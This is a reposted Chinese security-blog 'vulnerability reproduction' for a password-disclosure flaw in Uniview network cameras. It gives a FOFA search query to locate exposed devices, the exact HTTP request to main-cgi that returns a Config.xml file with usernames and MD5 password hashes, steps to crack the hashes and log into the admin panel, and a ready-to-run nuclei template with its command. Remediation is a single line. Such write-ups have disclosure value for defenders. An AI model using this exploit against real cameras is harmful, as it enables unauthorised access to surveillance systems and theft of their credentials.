【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)

admin 2023年12月13日09:47:22评论232 views字数 1387阅读4分37秒阅读模式


使



01

漏洞名称



宇视科技视频监控main-cgi密码泄露漏洞


02


漏洞影响


宇视(Uniview)高清网络摄像机

【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)



03


漏洞描述


宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。该系统main-cgi接口处存在信息泄露漏洞,可以获取账号密码。


04


FOFA搜索语句
app="uniview-视频监控"



05


漏洞复现


POC如下

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeAccept-Encoding: gzip

使用浏览器访问会下载一个Config.xml文件

【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)


其中UserName是用户名,UserPass是密码。使用MD5在线解密工具

【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)

即可登录后台




06


nuclei poc


poc文件内容如下

id: uniview-main-cgi-password-leak
info: name: 宇视科技视频监控 main-cgi 密码泄露漏洞 author: fgz severity: high description: 宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。该系统main-cgi接口处存在信息泄露漏洞,可以获取账号密码。 metadata: fofa-query: app="uniview-视频监控"requests: - raw: - | GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
matchers-condition: and matchers: - type: dsl dsl: - 'contains(body, "UserName")'

运行POC

nuclei.exe -t mypoc/其他/uniview-main-cgi-password-leak.yaml -u http://x.x.x.

【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)


07


修复建议


关注官方补丁公告

原文始发于微信公众号(AI与网安):【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月13日09:47:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】宇视科技视频监控main-cgi密码泄露漏洞(附POC)https://cn-sec.com/archives/2292980.html

发表评论

匿名网友 填写信息